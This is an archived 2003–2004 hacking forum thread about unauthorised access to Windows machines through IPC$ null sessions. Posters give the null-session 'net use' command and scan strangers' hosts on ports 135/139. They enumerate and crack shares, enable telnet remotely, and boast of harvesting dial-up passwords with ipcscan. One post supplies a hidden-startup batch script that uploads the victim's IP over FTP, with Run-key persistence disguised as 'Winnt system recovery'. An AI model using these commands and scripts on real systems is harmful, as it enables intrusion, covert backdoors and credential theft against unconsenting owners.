is it possible to hack, brute forcing or retrieve WIN NT IPC$ password remotely via WIN 98 ?
thanks guys..
KuunLB
Aug 14 2003, 01:05 AM
i noticed something awhile back..
when i tried access my computer (windows 2000 SP3) from a WinME machine.. i couldn't get past the IPC$ even with my own passwords.
the only way i could get past was by enabling a guest account on my machine (who would have ever thought?)
i'd be interested in seeing how secure IPC$ is
Kuun
shadowdancer123
Aug 14 2003, 05:23 AM
hi , Inter-Process Communication (IPC) is a way of exchanging info between client and server in a windows environment.But using ipc$ share (a default hidden share in windows) a remote user can establish a null session. (A null session is where a computer or user can connect to a remote machine without providing a user ID or password)
To connect using a null session use the following command: c:\>net use \\computer\ipc$ "" /user:""
But using an ipc$ u cannot hack into a machine
you can just enumerate the following
· The list of user accounts on that server · RAS callback numbers · Status of the account lockout for all users · Last logged on date and time for user accounts · Remote access to the Registry · Status of all NTFS file permissions on the system · Account policy on machine · User rights on the machine · List of services on the machine and their status
You can disable the default ipc$ share by setting the following registry key value to 2 HKLM\system\currentcontrolset\control\lsa\restrict annonymous
Regards
Shadow
ReMiXx
Aug 16 2003, 09:22 AM
You Should Try A Program Called ' X-Scan ' It Searches Machines For Weak Vulnerablility's. You Can Get It At http://www.xFocus.org. It's Useful For "Hacking" Or Finding Weak Vuln's In Your Computer So You Can Patch Them Up.
-Layta
andariel
Sep 8 2003, 02:52 PM
nice info shadow, i used it and i got a successful prompt. here is my prompt :
D:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" The command completed successfully.
D:\>net use New connections will be remembered.
Status Local Remote Network
------------------------------------------------------------------------------- OK \\195.146.48.251\ipc$ Microsoft Windows Network The command completed successfully.
D:\>
now what ? what can i do ?
PS: i don't know much about the net command, i just know about the send and use commands. is there a good and complete tutorial or document about it on the net ?
thanx, andariel
thatsmej
Sep 8 2003, 03:12 PM
QUOTE
now what ? what can i do ?
QUOTE
you can just enumerate the following
· The list of user accounts on that server · RAS callback numbers · Status of the account lockout for all users · Last logged on date and time for user accounts · Remote access to the Registry · Status of all NTFS file permissions on the system · Account policy on machine · User rights on the machine · List of services on the machine and their status
not much
and there are docs on the net just search using google..
jak3c
Sep 9 2003, 07:23 PM
at this time the remote windows share is mounted on your sustem. you can easyly copy files into the remote computer...and execute it whit NTcmd.exe but you must have a login and password.
use x scan !
netcomm
Sep 10 2003, 04:51 AM
google for ipcscan.exe
its awsome i have gained many a dial-up username and password with.
ipcscan.exe and damware
Peace NetComm
tyler.durden
Feb 12 2004, 10:06 AM
QUOTE (jak3c @ Sep 9 2003, 07:23 PM)
at this time the remote windows share is mounted on your sustem. you can easyly copy files into the remote computer...and execute it whit NTcmd.exe but you must have a login and password.
use x scan !
I'm trying in my LAN.
I have an admin account on local machine 192.168.100.25, and this is the classic Administrator/NULL.
So I can mount with net use all the share I want... but I cant use ntcmd.exe... how it work? Should it be the same of psexec.exe?
Another question guy... I tryed this method on internet also, making a little scan of 135/139 running box with simple account... if I try -net use x \\ip\sharedir "pass" /user:"user" - it does not work... mmmmh... I dont know what is wrong...
gephorce
Feb 12 2004, 04:34 PM
after you find someone with ports 135/139 open, your suppose to use the Nbtstat -A xxx.xxx.xxx.xxx command. that will tell if the person can share and what not. Whenever i use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you shares they have. If nothing shows up, then try a guess at using there Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well. If the person ends up using a password for there shares(C$,Admin$,...). Then you can use Programs like NAT to try cracking the passwords. I have yet to have it work but i've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrict annonymous, to 2 and it didn't get rid of the ipc$ share.
tyler.durden
Feb 12 2004, 05:02 PM
QUOTE (gephorce @ Feb 12 2004, 04:34 PM)
after you find someone with ports 135/139 open, your suppose to use the Nbtstat -A xxx.xxx.xxx.xxx command. that will tell if the person can share and what not. Whenever i use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you shares they have. If nothing shows up, then try a guess at using there Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well. If the person ends up using a password for there shares(C$,Admin$,...). Then you can use Programs like NAT to try cracking the passwords. I have yet to have it work but i've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrict annonymous, to 2 and it didn't get rid of the ipc$ share.
nice explanation, thank you... and really usefull the regkey for protect themself For me too the "nbtstat -a [or -A] IP" doesnt work... so I'm not alone, nice to see that lol
In some 139/135 scan I've found IP with \IPC$ null session workin... in their share I found the "SharedDocs" dir, the public share prvided by WinXP; if I map it with net use I can red/write inside... this looks cool for me, and I hope may execute also some proggy... is it possible?
ST.
Feb 12 2004, 05:21 PM
there was an exploit for non-patched windows 98 few years ago. try to find, it works well
gephorce
Feb 12 2004, 11:18 PM
You can use Computer Management to connect to there computer and enable services, etc... You can also use registry edit to do so. Using both, just go to file at top and you'll see remote connection options. (Not named that, but similar to )
If you enable Telnet, you can execute programs that way.
tyler.durden
Feb 13 2004, 09:12 AM
QUOTE (gephorce @ Feb 12 2004, 11:18 PM)
You can use Computer Management to connect to there computer and enable services, etc... You can also use registry edit to do so. Using both, just go to file at top and you'll see remote connection options. (Not named that, but similar to )
If you enable Telnet, you can execute programs that way.
who do you reply?
for doing this I think you must have ad admin account...
PL3X59
Feb 13 2004, 09:42 AM
try to use ntscan modul when there is an ipc$ account ... i think this is ntcmd
or you can use dameware nt utilities this is a very nice tool
so, if you can find an ipc$ account, and if you can t use it, maybe you have a firewall ?
or try to see in the regedit if the restricanonymous = 0
plex
PL3X59
Feb 13 2004, 12:20 PM
argg
i can t made a new post so
is any one know a program whitch can tel me the @ip of the machine where it was installed ...
i can use an dyndns for exemple ... is there any one invisible ?
thx
plex
oYost
Feb 13 2004, 12:41 PM
The best solution is to put a bot irc on your stro, so you can take the new ip when it connects, but u can write too a batch to who send the new ip on a ftp :
CODE
waitfor 300 (to wait for the connection) ipconfig >> c:\IP.txt echo open IPOFTHEFTP PORTOFTHEFTP >> c:\temp.ini echo user >> c:\temp.ini echo pass >> c:\temp.ini echo put c:\1.txt >> c:\temp.ini echo quit >> c:\temp.ini ftp -s:c:\temp.ini exit
And you have to run this batch silently at the startup with hiderun or hidden32.
Sorry for my english
[EDIT] You have to download waitfor.exe and put him in the %windir% directory
PL3X59
Feb 13 2004, 12:58 PM
oYost u understand my question and this is a good reply, but i know this 2 methods ...
in fact
firt, with an ipconfig /all maybe you dont have the correct ip ... if there is for exemple a routeur(in french lol) (you know ?? routeur ?? cisco ?? lol) I have my batch file you know and hidden 32 :-p
to put the program on the boot 2 keys for regedit
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg echo "Winnt system recovery"="c:\\projet\\run.bat /yes">>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg echo "Winnt system recovery"="c:\\projet\\hide.bat /yes">>root.reg ... in fact i m looking for any cmd to put the very @ip published on Internet in the .txt
but there is come programmes like direct update for dyndns.org ... for exemple...
maybe there is any one very simple and invisible :-D
plex
i like this forum :-D
Thx oYost
but why can i made new post
oYost
Feb 13 2004, 01:31 PM
Hehe, on peut parler francais de france alors , non on va sfaire kicker mais juste pour ce poste : "in fact i m looking for any cmd to put the very @ip published on Internet in the .txt" Ca faut que tu m'explique en francais
Sorry all for this little speech in French , to translate http://tr.voila.fr/
PL3X59
Feb 13 2004, 01:39 PM
ok mec
i m looking for a command whitch tel me the @ip published on the internet
when you have a routeur like a cisco ... with an ipconfig /all
you 'll have
lan ip 192.168.0.1 for exemple MSR 255.255.255.0 for exemple gateway ... 192.168.0.254
I haven't compile it but you can try and maybe modify it to create a file text which contain the IP, good luck
gephorce
Feb 13 2004, 05:38 PM
Why Don't you just go to Www.Whatismyip.com ?
I can't make new posts either, it sucks.
PL3X59
Feb 14 2004, 09:55 PM
but ... in a batch file ... you can't take this @ip and put it in a txt file ..
i'll try visualbasic :-p
wetwilly
Feb 19 2004, 12:08 AM
how come I cannot connect with the standard administrator/null on a xp home box?
piranicon
Feb 19 2004, 06:49 AM
hmm i wrote a vb app that pulls the info from my router, parses it and spits out the wan ip, but you'd have to configure the code to work on different router. Thats the only way i found to get the Wan ip without connecting to a remote site.
caleb
Feb 19 2004, 04:38 PM
QUOTE
how come I cannot connect with the standard administrator/null on a xp home box?
Xp home only allows guest logins... This is part of simple file sharing, which can't be disabled in xp home, as far as I know. This means, there really is no way to log on remotely to a xp home machine except as a guest.
o0oKARo0o
Feb 20 2004, 01:39 AM
To scan IPC, fxscanner is very nice, u can install remotely and then use dameware to access the machine..
wetwilly
Feb 22 2004, 02:07 PM
QUOTE (caleb @ Feb 19 2004, 04:38 PM)
QUOTE
how come I cannot connect with the standard administrator/null on a xp home box?
Xp home only allows guest logins... This is part of simple file sharing, which can't be disabled in xp home, as far as I know. This means, there really is no way to log on remotely to a xp home machine except as a guest.
ok, thanks alot for that info!
It has been nagging me !
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
and really usefull the regkey for protect themself 
, non on va sfaire kicker mais juste pour ce poste : 